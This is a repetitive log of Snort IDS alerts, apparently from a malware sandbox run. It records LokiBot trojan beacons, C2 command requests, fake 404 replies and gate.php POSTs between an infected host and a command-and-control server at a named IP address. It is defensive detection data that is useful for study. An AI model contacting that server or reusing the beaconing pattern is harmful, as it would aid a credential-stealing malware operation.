              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49744
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49747 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49747 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49747
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49748 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49748 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49748
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49749 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49749
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49750 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49750 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49750
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49751 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49751 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49751
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49752 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49752 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49752
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49755 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49755 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49755
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49756 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49756 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49756
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49758 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49758 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49758
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49759 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49759 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49759
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49760 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49760 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49760
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49761 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49761 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49761
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49762 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49762 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49762
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49763 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49763 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49763
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49764 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49764 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49764
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49765 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49765 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49765
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49766 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49766 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49766
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49767 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49767 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49767 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49767 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49767 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49767
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49768 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49768 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49768 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49768 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49768 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49768
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49769 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49769 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49769 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49769 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49769 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49769
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49770 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49770 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49770 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49770 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49770 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49770
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49771 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49771 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49771 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49771 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49771 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49771
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49772 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49772 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49772 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49772 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49772 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49772
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49773 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49773 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49773
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49774 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49774 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49774 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49774 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49774 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49774
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49775 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49775 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49775 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49775 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49775 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49775
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49776 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49776 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49776 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49776 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49776 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49776
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49777 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49777 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49777 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49777 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49777 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49777
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49778 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49778 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49778 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49778 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49778 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49778
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49779 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49779 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49779 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49779 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49779 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49779
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49780 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49780 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49780 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49780 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49780 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49780
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49781 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49781 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49781 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49781 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49781 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49781
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49782 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49782 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49782 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49782 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49782 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49782
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49783 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49783 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49783 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49783 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49783 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49783
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49784 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49784 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49784 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49784 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49784 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49784
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49785 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49785 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49785 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49785 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49785 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49785
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49786 -> 47.91.79.163:80
